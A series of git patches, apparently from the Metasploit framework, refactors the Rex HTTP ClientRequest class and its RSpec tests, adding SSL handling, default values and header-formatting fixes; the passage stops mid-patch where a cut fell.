b/lib/rex/proto/http/client.rb @@ -179,7 +179,8 @@ class Client opts['method'] ||= 'GET' opts['proto'] ||= 'HTTP' opts['query'] ||= '' - + + opts['ssl'] = self.ssl opts['cgi'] = false opts['port'] = self.port opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' @@ -222,6 +223,7 @@ class Client opts['vars_get'] ||= {} opts['vars_post'] ||= {} + opts['ssl'] = self.ssl opts['cgi'] = true opts['port'] = self.port opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 9c87834499..b5fc283ac8 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -26,6 +26,7 @@ class ClientRequest attr_accessor :protocol attr_accessor :query attr_accessor :raw_headers + attr_accessor :ssl attr_accessor :uri attr_accessor :user_agent attr_accessor :vars_get @@ -36,7 +37,7 @@ class ClientRequest def initialize(opts={}) @cgi = opts['cgi'] - @config = opts['client_config'] + @config = opts['client_config'] || {} @connection = opts['connection'] @content_type = opts['ctype'] @cookie = opts['cookie'] @@ -50,6 +51,7 @@ class ClientRequest @port = opts['port'] @protocol = opts['proto'] @query = opts['query'] + @ssl = opts['ssl'] || false @raw_headers = opts['raw_headers'] @uri = opts['uri'] @user_agent = opts['agent'] @@ -160,7 +162,7 @@ class ClientRequest end def set_uri - uri_str = uri + uri_str = uri.dup if (config['uri_dir_self_reference']) uri_str.gsub!('/', '/./') end @@ -179,7 +181,7 @@ class ClientRequest end if (config['uri_full_url']) - url = self.ssl ? "https" : "http" + url = self.ssl ? "https://" : "http://" url << self.config['vhost'] url << ((self.port == 80) ? "" : ":#{self.port}") url << uri_str @@ -190,7 +192,7 @@ class ClientRequest end def set_cgi - uri_str = uri + uri_str = uri.dup if (config['uri_dir_self_reference']) uri_str.gsub!('/', '/./') end @@ -221,7 +223,7 @@ class ClientRequest end def set_encode_uri(str) - a = str + a = str.dup config['uri_encode_count'].times { a = Rex::Text.uri_encode(a, config['uri_encode_mode']) } @@ -229,7 +231,7 @@ class ClientRequest end def set_method - ret = method + ret = method.dup if (config['method_random_valid']) ret = ['GET', 'POST', 'HEAD'][rand(3)] diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb new file mode 100644 index 0000000000..894b5d9792 --- /dev/null +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -0,0 +1,184 @@ +require 'spec_helper' + +require 'rex/proto/http/client_request' + +shared_context "with 'uri_dir_self_reference'" do + before(:all) do + client_request.config['uri_dir_self_reference'] = true + end + + describe "#set_uri" do + it "should return the unmodified uri" do + client_request.send(:set_uri).should == "/./" + end + end +end + +shared_context "with no evasions" do + before(:all) do + client_request.config['uri_dir_self_reference'] = false + client_request.config['uri_fake_params_start'] = false + client_request.config['uri_full_url'] = false + end + + describe "#set_uri" do + it "should return the unmodified uri" do + client_request.send(:set_uri).should == "/" + end + end +end + +shared_context "with 'uri_full_url'" do + + before(:all) do + client_request.config['uri_full_url'] = true + end + + before(:each) do + client_request.config['vhost'] = host + end + + context "with ipv4 host" do + let(:host) { '192.0.2.1' } + + it_behaves_like "uri_full_url" + end + + context "with ipv6 host" do + let(:host) { '2001:DB8::1' } + #before(:each) do + # client_request.config['vhost'] = "[#{host}]" + #end + + it_behaves_like "uri_full_url" + end + + context "with dns host" do + let(:host) { 'www.example.com' } + + it_behaves_like "uri_full_url" + end + +end + +shared_examples "uri_full_url" do + + it "should have the host in the URI" do + client_request.send(:set_uri).should start_with("http://#{host}/") + end + +end + + +describe Rex::Proto::Http::ClientRequest do + + default_options = { + # All of these should be what you get when you pass in empty + # options, but of course that would make it too easy + 'uri' => '/', + 'method' => "GET", + 'proto' => "HTTP", + 'connection' => "close", + 'version' => "1.1", + 'port' => 80, + } + + [ + [ "with reasonable default options", + default_options.merge({ + 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", + # Yes, vhost is in the config. There is no godly reason why this + # should be so. + 'client_config' => { 'vhost' => 'www.example.com', }, + }), + { + :set_cgi => { :result => "/" }, + :set_uri => { :result => "/" }, + :set_method => { :result => "GET" }, + :set_version => { :result => "HTTP/1.1\r\n" }, + :set_uri_prepend => { :result => "" }, + :set_uri_append => { :result => "" }, + :set_agent_header => { :result => "User-Agent: Mozilla/4.0 (compatible; Metasploit RSPEC)\r\n" }, + :set_host_header => { :result => "Host: www.example.com\r\n" }, + :set_formatted_header => { :args => ["Foo", "Bar"], :result => "Foo: Bar\r\n" }, + :set_formatted_header => { :args => ["foo", "Bar"], :result => "foo: Bar\r\n" }, + :set_formatted_header => { :args => ["Foo", "Bar\twith\ttabs"], :result => "Foo: Bar\twith\ttabs\r\n" }, + :set_formatted_header => { :args => ["Foo\twith\tabs", "Bar"], :result => "Foo\twith\tabs: Bar\r\n" }, + } + ], + + [ "with header folding", + default_options.merge({ + 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", + 'client_config' => { 'header_folding' => true, } + }), + { + :set_uri => { :result => "/" }, + :set_method => { :result => "GET" }, + :set_version => { :result => "HTTP/1.1\r\n" }, + :set_agent_header => { :result => "User-Agent:\r\n\tMozilla/4.0 (compatible; Metasploit RSPEC)\r\n" }, + :set_cookie_header => { :result => "" }, + :set_connection_header => { :result => "Connection:\r\n\tclose\r\n" }, + :set_formatted_header => { :args => ["Foo", "Bar"], :result => "Foo:\r\n\tBar\r\n" }, + :set_formatted_header => { :args => ["foo", "Bar"], :result => "foo:\r\n\tBar\r\n" }, + :set_formatted_header => { :args => ["Foo", "Bar\twith\ttabs"], :result => "Foo:\r\n\tBar\twith\ttabs\r\n" }, + :set_formatted_header => { :args => ["Foo\twith\tabs", "Bar"], :result => "Foo\twith\tabs:\r\n\tBar\r\n" }, + } + ], + + [ "with ipv6 host", + default_options.merge({ + 'client_config' => { 'vhost' => "2001:DB8::1" }, + }), + { + :set_host_header => { :result => "Host: [2001:DB8::1]\r\n" }, + } + ], + + [ "with ipv6 host and non-default port", + default_options.merge({ + 'port' => 1234, + 'client_config' => { 'vhost' => "2001:DB8::1" }, + }), + { + :set_host_header => { :result => "Host: [2001:DB8::1]:1234\r\n" }, + } + ] + ].each do |c, opts, expectations| + context c do + subject(:client_request) { Rex::Proto::Http::ClientRequest.new(opts) } + + expectations.each do |meth, things| + args = things[:args] || [] + result = things[:result] + describe "##{meth}" do + it "should return #{result.inspect}" do + client_request.send(meth, *args).should == result + end + end + end + + end + end + + subject(:client_request) { Rex::Proto::Http::ClientRequest.new(default_options) } + + context "with GET paramaters" do + subject(:client_request) { + options_with_params = default_options.merge({ + 'vars_get' => { + 'foo[]' => 'bar', + 'foo[]' => 'baz', + } + }) + Rex::Proto::Http::ClientRequest.new(options_with_params) + } + end + + describe "#set_uri" do + it_behaves_like "with 'uri_full_url'" + it_behaves_like "with 'uri_dir_self_reference'" + it_behaves_like "with no evasions" + end + +end \ No newline at end of file From cae030ccd72bf7065eb9c204cec47fc8fc35258c Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:25:37 -0600 Subject: [PATCH 31/87] Whitespace --- .../lib/rex/proto/http/client_request_spec.rb | 86 ++++++++++--------- 1 file changed, 46 insertions(+), 40 deletions(-) diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 894b5d9792..c5ac25a5ca 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -1,77 +1,77 @@ require 'spec_helper' - + require 'rex/proto/http/client_request' - + shared_context "with 'uri_dir_self_reference'" do before(:all) do client_request.config['uri_dir_self_reference'] = true end - + describe "#set_uri" do it "should return the unmodified uri" do client_request.send(:set_uri).should == "/./" end end end - + shared_context "with no evasions" do before(:all) do client_request.config['uri_dir_self_reference'] = false client_request.config['uri_fake_params_start'] = false client_request.config['uri_full_url'] = false end - + describe "#set_uri" do it "should return the unmodified uri" do client_request.send(:set_uri).should == "/" end end end - + shared_context "with 'uri_full_url'" do - + before(:all) do client_request.config['uri_full_url'] = true end - + before(:each) do client_request.config['vhost'] = host end - + context "with ipv4 host" do let(:host) { '192.0.2.1' } - + it_behaves_like "uri_full_url" end - + context "with ipv6 host" do let(:host) { '2001:DB8::1' } #before(:each) do # client_request.config['vhost'] = "[#{host}]" #end - + it_behaves_like "uri_full_url" end - + context "with dns host" do let(:host) { 'www.example.com' } - + it_behaves_like "uri_full_url" end - + end - + shared_examples "uri_full_url" do - + it "should have the host in the URI" do client_request.send(:set_uri).should start_with("http://#{host}/") end - + end - - + + describe Rex::Proto::Http::ClientRequest do - + default_options = { # All of these should be what you get when you pass in empty # options, but of course that would make it too easy @@ -82,16 +82,16 @@ describe Rex::Proto::Http::ClientRequest do 'version' => "1.1", 'port' => 80, } - - [ + + [ [ "with reasonable default options", default_options.merge({ 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", # Yes, vhost is in the config. There is no godly reason why this - # should be so. + # should be so. 'client_config' => { 'vhost' => 'www.example.com', }, }), - { + { :set_cgi => { :result => "/" }, :set_uri => { :result => "/" }, :set_method => { :result => "GET" }, @@ -106,13 +106,13 @@ describe Rex::Proto::Http::ClientRequest do :set_formatted_header => { :args => ["Foo\twith\tabs", "Bar"], :result => "Foo\twith\tabs: Bar\r\n" }, } ], - + [ "with header folding", default_options.merge({ 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", 'client_config' => { 'header_folding' => true, } }), - { + { :set_uri => { :result => "/" }, :set_method => { :result => "GET" }, :set_version => { :result => "HTTP/1.1\r\n" }, @@ -125,29 +125,29 @@ describe Rex::Proto::Http::ClientRequest do :set_formatted_header => { :args => ["Foo\twith\tabs", "Bar"], :result => "Foo\twith\tabs:\r\n\tBar\r\n" }, } ], - + [ "with ipv6 host", default_options.merge({ 'client_config' => { 'vhost' => "2001:DB8::1" }, }), - { + { :set_host_header => { :result => "Host: [2001:DB8::1]\r\n" }, } ], - + [ "with ipv6 host and non-default port", default_options.merge({ - 'port' => 1234, + 'port' => 1234, 'client_config' => { 'vhost' => "2001:DB8::1" }, }), - { + { :set_host_header => { :result => "Host: [2001:DB8::1]:1234\r\n" }, } ] ].each do |c, opts, expectations| context c do subject(:client_request) { Rex::Proto::Http::ClientRequest.new(opts) } - + expectations.each do |meth, things| args = things[:args] || [] result = things[:result] @@ -157,28 +157,34 @@ describe Rex::Proto::Http::ClientRequest do end end end - + end end - + subject(:client_request) { Rex::Proto::Http::ClientRequest.new(default_options) } - + context "with GET paramaters" do subject(:client_request) { options_with_params = default_options.merge({ + 'cgi' => true, 'vars_get' => { 'foo[]' => 'bar', - 'foo[]' => 'baz', + 'foo[]' => 'baz', } }) Rex::Proto::Http::ClientRequest.new(options_with_params) } + + it "should contain the params" do + client_request.to_s.should contain("foo[]=bar") + client_request.to_s.should contain("foo[]=baz") + end end - + describe "#set_uri" do it_behaves_like "with 'uri_full_url'" it_behaves_like "with 'uri_dir_self_reference'" it_behaves_like "with no evasions" end - -end \ No newline at end of file + +end From 7b3a11f2f99213c00a12c0a8c165d26852ce296b Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:28:44 -0600 Subject: [PATCH 32/87] Axe tests that belong in client_request_spec --- spec/lib/rex/proto/http/client_spec.rb | 90 -------------------------- 1 file changed, 90 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 937130a1f4..0105b11136 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -121,96 +121,6 @@ describe Rex::Proto::Http::Client do this_cli.pipelining?.should be_true end - it "should return an encoded URI", :pending => excuse_lazy(:set_encode_uri) do - - end - - it "should return an encoded query string", :pending => excuse_lazy(:set_encode_qa) do - - end - - # These set_ methods all exercise the evasion opts, looks like - - it "should set and return the URI", :pending => excuse_lazy(:set_uri) do - - end - - it "should set and return the CGI", :pending => excuse_lazy(:set_cgi) do - - end - - it "should set and return the HTTP verb", :pending => excuse_lazy(:set_method) do - - end - - it "should set and return the version string", :pending => excuse_lazy(:set_version) do - - end - - it "should set and return the HTTP seperator and body string", :pending => excuse_lazy(:set_body) do - - end - - it "should set and return the path", :pending => excuse_lazy(:set_path_info) do - - end - - it "should set and return the whitespace between method and URI", :pending => excuse_lazy(:set_method_uri_spacer) do - - end - - it "should set and return the whitespace between the version and URI", :pending => excuse_lazy(:set_uri_version_spacer) do - - end - - it "should set and return padding before the URI", :pending => excuse_lazy(:set_uri_prepend) do - - end - - it "should set and return padding after the URI" do - @cli.set_uri_append.should be_empty - end - - it "should set and return the host header", :pending => excuse_lazy(:set_host_header) do - - end - - it "should set and return the agent header", :pending => excuse_lazy(:set_agent_header) do - - end - - it "should set and return the cookie header", :pending => excuse_lazy(:set_cookie_header) do - - end - - it "should set and return the content-type header", :pending => excuse_lazy(:set_cookie_header) do - - end - - it "should set and return the content-length header", :pending => excuse_lazy(:set_content_len_header) do - - end - - it "should set and return the basic authentication header", :pending => excuse_lazy(:set_basic_auth_header) do - - end - - it "should set and return any extra headers", :pending => excuse_lazy(:set_extra_headers) do - - end - - it "should set the chunked encoding header", :pending => excuse_lazy(:set_chunked_header) do - - end - - it "should set and return raw_headers", :pending => "#set_raw_headers() doesn't seem to actually do anything" do - - end - - it "should set and return a formatted header", :pending => excuse_lazy(:set_formatted_header) do - - end - it "should respond to its various accessors" do @cli.should respond_to :config @cli.should respond_to :config_types From 5e0161d3f748e058233799567f6c3b7351ee6539 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:31:24 -0600 Subject: [PATCH 33/87] Reflect new ClientRequst in docs --- lib/rex/proto/http/client.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 928cbf4b4b..8bb69f2735 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -167,7 +167,7 @@ class Client # @option opts 'version' [String] version of the protocol, default: 1.1 # @option opts 'vhost' [String] Host header value # - # @return [Request] + # @return [ClientRequest] def request_raw(opts={}) opts['agent'] ||= config['agent'] opts['data'] ||= '' @@ -206,7 +206,7 @@ class Client # @option opts 'vars_get' [Hash] GET variables as a hash to be translated into a query string # @option opts 'vars_post' [Hash] POST variables as a hash to be translated into POST data # - # @return [Request] + # @return [ClientRequest] def request_cgi(opts={}) opts['agent'] ||= config['agent'] opts['data'] ||= '' @@ -322,7 +322,7 @@ class Client # # Send an HTTP request to the server # - # @param req [Request,#to_s] The request to send + # @param req [Request,ClientRequest,#to_s] The request to send # @param t (see #connect) # def send_request(req, t = -1) @@ -333,6 +333,7 @@ class Client # Resends an HTTP Request with the propper authentcation headers # set. If we do not support the authentication type the server requires # we return the original response object + # # @param res [Response] the HTTP Response object # @param opts [Hash] the options used to generate the original HTTP request # @param t [Fixnum] the timeout for the request in seconds From 764bbbb8e5a8068a2bd100199b40e36f3895d0d5 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:33:19 -0600 Subject: [PATCH 34/87] Whitespace --- lib/rex/proto/http/client_request.rb | 42 ++++++++++++++-------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 26592be1ca..2722483200 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -36,28 +36,28 @@ class ClientRequest attr_reader :opts def initialize(opts={}) - @cgi = opts['cgi'] - @config = opts['client_config'] || {} - @connection = opts['connection'] - @content_type = opts['ctype'] - @cookie = opts['cookie'] - @data = opts['data'] - @encode = opts['encode'] + @cgi = opts['cgi'] + @config = opts['client_config'] || {} + @connection = opts['connection'] + @content_type = opts['ctype'] + @cookie = opts['cookie'] + @data = opts['data'] + @encode = opts['encode'] @encode_params = opts['encode_params'] - @headers = opts['headers'] - @host = opts['vhost'] - @method = opts['method'] - @path = opts['path_info'] - @port = opts['port'] - @protocol = opts['proto'] - @query = opts['query'] - @ssl = opts['ssl'] || false - @raw_headers = opts['raw_headers'] - @uri = opts['uri'] - @user_agent = opts['agent'] - @vars_get = opts['vars_get'] - @vars_post = opts['vars_post'] - @version = opts['version'] + @headers = opts['headers'] + @host = opts['vhost'] + @method = opts['method'] + @path = opts['path_info'] + @port = opts['port'] + @protocol = opts['proto'] + @query = opts['query'] + @ssl = opts['ssl'] || false + @raw_headers = opts['raw_headers'] + @uri = opts['uri'] + @user_agent = opts['agent'] + @vars_get = opts['vars_get'] + @vars_post = opts['vars_post'] + @version = opts['version'] @opts = opts end From d463460da7ff12e3bc5a62cd71662bb21c26721c Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:33:54 -0600 Subject: [PATCH 35/87] Default cgi to true when not given --- lib/rex/proto/http/client_request.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 2722483200..69c24d7a95 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -36,7 +36,7 @@ class ClientRequest attr_reader :opts def initialize(opts={}) - @cgi = opts['cgi'] + @cgi = (opts['cgi'].nil? ? true : false) @config = opts['client_config'] || {} @connection = opts['connection'] @content_type = opts['ctype'] From c206ac4998f1b066f366d26159afff1d1aa21c07 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 14:15:51 -0600 Subject: [PATCH 36/87] Set some reasonable defaults Fixes a number of nil deref issues --- lib/rex/proto/http/client_request.rb | 20 ++++++++++--------- .../lib/rex/proto/http/client_request_spec.rb | 4 ++-- 2 files changed, 13 insertions(+), 11 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 69c24d7a95..c73144c2bb 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -36,29 +36,31 @@ class ClientRequest attr_reader :opts def initialize(opts={}) - @cgi = (opts['cgi'].nil? ? true : false) @config = opts['client_config'] || {} @connection = opts['connection'] @content_type = opts['ctype'] @cookie = opts['cookie'] - @data = opts['data'] + @data = opts['data'] || "" @encode = opts['encode'] @encode_params = opts['encode_params'] - @headers = opts['headers'] + @headers = opts['headers'] || {} @host = opts['vhost'] - @method = opts['method'] + @method = opts['method'] || "GET" @path = opts['path_info'] - @port = opts['port'] - @protocol = opts['proto'] - @query = opts['query'] - @ssl = opts['ssl'] || false - @raw_headers = opts['raw_headers'] + @port = opts['port'] || 80 + @protocol = opts['proto'] || "HTTP" + @query = opts['query'] || "" + @ssl = opts['ssl'] || false + @raw_headers = opts['raw_headers'] || "" @uri = opts['uri'] @user_agent = opts['agent'] @vars_get = opts['vars_get'] @vars_post = opts['vars_post'] @version = opts['version'] @opts = opts + + config['chunked_size'] ||= 0 + config['pad_method_uri_count'] ||= 1 end def to_s diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index c5ac25a5ca..1dba9ca48d 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -176,8 +176,8 @@ describe Rex::Proto::Http::ClientRequest do } it "should contain the params" do - client_request.to_s.should contain("foo[]=bar") - client_request.to_s.should contain("foo[]=baz") + client_request.to_s.should include("foo[]=bar") + client_request.to_s.should include("foo[]=baz") end end From d7de3b75a43975ae2cb898bb8cf1b71737811924 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 14:18:20 -0600 Subject: [PATCH 37/87] Format Authorization header like others Also sorts the set_*_header methods --- lib/rex/proto/http/client_request.rb | 61 +++++++++++++--------------- 1 file changed, 29 insertions(+), 32 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index c73144c2bb..efc6e2b95c 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -142,10 +142,7 @@ class ClientRequest req << set_agent_header end - if authorization - req << set_auth_header - end - + req << set_auth_header req << set_cookie_header req << set_connection_header req << set_extra_headers @@ -159,10 +156,6 @@ class ClientRequest protected - def set_auth_header - "Authorization: " + authorization - end - def set_uri uri_str = uri.dup if (config['uri_dir_self_reference']) @@ -347,23 +340,14 @@ class ClientRequest end # - # Return the HTTP Host header + # Return a formatted header string # - def set_host_header - return "" if config['uri_full_url'] - host ||= config['vhost'] - - # IPv6 addresses must be placed in brackets - if Rex::Socket.is_ipv6?(host) - host = "[#{host}]" + def set_formatted_header(var, val) + if (self.config['header_folding']) + "#{var}:\r\n\t#{val}\r\n" + else + "#{var}: #{val}\r\n" end - - # The port should be appended if non-standard - if not [80,443].include?(port) - host = host + ":#{port}" - end - - set_formatted_header("Host", host) end # @@ -373,15 +357,8 @@ class ClientRequest user_agent ? set_formatted_header("User-Agent", user_agent) : "" end - # - # Return a formatted header string - # - def set_formatted_header(var, val) - if (self.config['header_folding']) - "#{var}:\r\n\t#{val}\r\n" - else - "#{var}: #{val}\r\n" - end + def set_auth_header + authorization ? set_formatted_header("Authorization", authorization) : "" end # @@ -412,6 +389,26 @@ class ClientRequest set_formatted_header("Content-Length", clen) end + # + # Return the HTTP Host header + # + def set_host_header + return "" if config['uri_full_url'] + host ||= config['vhost'] + + # IPv6 addresses must be placed in brackets + if Rex::Socket.is_ipv6?(host) + host = "[#{host}]" + end + + # The port should be appended if non-standard + if not [80,443].include?(port) + host = host + ":#{port}" + end + + set_formatted_header("Host", host) + end + # # Return a string of formatted extra headers # From 579c11bc690573c15f01413b875f212461419fcf Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 14:25:39 -0600 Subject: [PATCH 38/87] Set reasonable defaults for more things All current tests are passing now --- lib/rex/proto/http/client_request.rb | 5 +++-- spec/lib/rex/proto/http/client_request_spec.rb | 2 -- 2 files changed, 3 insertions(+), 4 deletions(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index efc6e2b95c..3f6ac6b760 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -36,6 +36,7 @@ class ClientRequest attr_reader :opts def initialize(opts={}) + @cgi = (opts['cgi'].nil? ? true : opts['cgi']) @config = opts['client_config'] || {} @connection = opts['connection'] @content_type = opts['ctype'] @@ -54,8 +55,8 @@ class ClientRequest @raw_headers = opts['raw_headers'] || "" @uri = opts['uri'] @user_agent = opts['agent'] - @vars_get = opts['vars_get'] - @vars_post = opts['vars_post'] + @vars_get = opts['vars_get'] || {} + @vars_post = opts['vars_post'] || {} @version = opts['version'] @opts = opts diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 1dba9ca48d..14d28e8001 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -169,7 +169,6 @@ describe Rex::Proto::Http::ClientRequest do 'cgi' => true, 'vars_get' => { 'foo[]' => 'bar', - 'foo[]' => 'baz', } }) Rex::Proto::Http::ClientRequest.new(options_with_params) @@ -177,7 +176,6 @@ describe Rex::Proto::Http::ClientRequest do it "should contain the params" do client_request.to_s.should include("foo[]=bar") - client_request.to_s.should include("foo[]=baz") end end From 93537de68ca76601175512d6589115ae96b7e387 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 16:27:32 -0600 Subject: [PATCH 39/87] Use let and subject blocks for better readability --- spec/lib/rex/proto/http/client_spec.rb | 79 +++++++++++++------------- 1 file changed, 39 insertions(+), 40 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 0105b11136..d0e222df84 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -28,33 +28,32 @@ describe Rex::Proto::Http::Client do end - before(:all) do - @ip = "1.2.3.4" - @cli = Rex::Proto::Http::Client.new(@ip) + let(:ip) { "1.2.3.4" } + subject(:cli) do + Rex::Proto::Http::Client.new(ip) end it "should respond to intialize" do - @cli.should be + cli.should be end it "should have a set of default instance variables" do - @cli.instance_variable_get(:@hostname).should == @ip - @cli.instance_variable_get(:@port).should == 80 - @cli.instance_variable_get(:@context).should == {} - @cli.instance_variable_get(:@ssl).should be_false - @cli.instance_variable_get(:@proxies).should be_nil - # @cli.instance_variable_get(:@username).should be_empty - # @cli.instance_variable_get(:@password).should be_empty - @cli.config.should be_a_kind_of Hash - @cli.config_types.should be_a_kind_of Hash + cli.instance_variable_get(:@hostname).should == ip + cli.instance_variable_get(:@port).should == 80 + cli.instance_variable_get(:@context).should == {} + cli.instance_variable_get(:@ssl).should be_false + cli.instance_variable_get(:@proxies).should be_nil + # cli.instance_variable_get(:@username).should be_empty + # cli.instance_variable_get(:@password).should be_empty + cli.config.should be_a_kind_of Hash end it "should produce a raw HTTP request", :pending => "Waiting for PR #1500" do - @cli.request_raw.should be_a_kind_of Rex::Proto::Http::Request + cli.request_raw.should be_a_kind_of Rex::Proto::Http::ClientRequest end it "should produce a CGI HTTP request", :pending => "Waiting for PR #1500" do - @cli.request_cgi.should be_a_kind_of Rex::Proto::Http::Request + cli.request_cgi.should be_a_kind_of Rex::Proto::Http::ClientRequest end it "should attempt to connect to a server" do @@ -63,7 +62,7 @@ describe Rex::Proto::Http::Client do end it "should be able to close a connection" do - @cli.close.should be_nil + cli.close.should be_nil end it "should send a request and receive a response", :pending => excuse_needs_connection do @@ -79,7 +78,7 @@ describe Rex::Proto::Http::Client do end it "should test for credentials" do - # @cli.should_not have_creds + # cli.should_not have_creds # this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) # this_cli.should have_creds pending "Should actually respond to :has_creds" @@ -91,7 +90,7 @@ describe Rex::Proto::Http::Client do u = "user1" p = "pass1" b64 = ["#{u}:#{p}"].pack("m*").strip - @cli.basic_auth_header("user1","pass1").should == "Basic #{b64}" + cli.basic_auth_header("user1","pass1").should == "Basic #{b64}" end it "should perform digest authentication", :pending => excuse_needs_auth do @@ -107,45 +106,45 @@ describe Rex::Proto::Http::Client do end it "should end a connection with a stop" do - @cli.stop.should be_nil + cli.stop.should be_nil end it "should test if a connection is valid" do - @cli.conn?.should be_false + cli.conn?.should be_false end it "should tell if pipelining is enabled" do - @cli.pipelining?.should be_false + cli.pipelining?.should be_false this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1) this_cli.pipeline = true this_cli.pipelining?.should be_true end it "should respond to its various accessors" do - @cli.should respond_to :config - @cli.should respond_to :config_types - @cli.should respond_to :pipeline - @cli.should respond_to :local_host - @cli.should respond_to :local_port - @cli.should respond_to :conn - @cli.should respond_to :context - @cli.should respond_to :proxies - # @cli.should respond_to :username - # @cli.should respond_to :password - @cli.should respond_to :junk_pipeline + cli.should respond_to :config + cli.should respond_to :config_types + cli.should respond_to :pipeline + cli.should respond_to :local_host + cli.should respond_to :local_port + cli.should respond_to :conn + cli.should respond_to :context + cli.should respond_to :proxies + # cli.should respond_to :username + # cli.should respond_to :password + cli.should respond_to :junk_pipeline # These are supposed to be protected - @cli.should respond_to :ssl - @cli.should respond_to :ssl_version - @cli.should respond_to :hostname - @cli.should respond_to :port + cli.should respond_to :ssl + cli.should respond_to :ssl_version + cli.should respond_to :hostname + cli.should respond_to :port end # Not super sure why these are protected... it "should refuse access to its protected accessors" do - expect {@cli.ssl}.to raise_error NoMethodError - expect {@cli.ssl_version}.to raise_error NoMethodError - expect {@cli.hostname}.to raise_error NoMethodError - expect {@cli.port}.to raise_error NoMethodError + expect {cli.ssl}.to raise_error NoMethodError + expect {cli.ssl_version}.to raise_error NoMethodError + expect {cli.hostname}.to raise_error NoMethodError + expect {cli.port}.to raise_error NoMethodError end end From 935304ee0c31477a0e5ae9f890f168636fb91b95 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 16:36:36 -0600 Subject: [PATCH 40/87] No longer pending --- spec/lib/rex/proto/http/client_spec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index d0e222df84..d216c75325 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -48,11 +48,11 @@ describe Rex::Proto::Http::Client do cli.config.should be_a_kind_of Hash end - it "should produce a raw HTTP request", :pending => "Waiting for PR #1500" do + it "should produce a raw HTTP request" do cli.request_raw.should be_a_kind_of Rex::Proto::Http::ClientRequest end - it "should produce a CGI HTTP request", :pending => "Waiting for PR #1500" do + it "should produce a CGI HTTP request" do cli.request_cgi.should be_a_kind_of Rex::Proto::Http::ClientRequest end From 29df20996e537076e9f6ee33fb92fdd2b908a069 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 17:38:03 -0600 Subject: [PATCH 41/87] Move most of the configuration into ClientRequest Also fixes in-place modification of the query string which resulted in duplication of the GET parameters when calling #to_s more than once. --- lib/rex/proto/http/client.rb | 79 ++--------------- lib/rex/proto/http/client_request.rb | 88 ++++++++++++++----- lib/rex/text.rb | 4 +- .../lib/rex/proto/http/client_request_spec.rb | 72 ++++++++++++--- 4 files changed, 132 insertions(+), 111 deletions(-) diff --git a/lib/rex/proto/http/client.rb 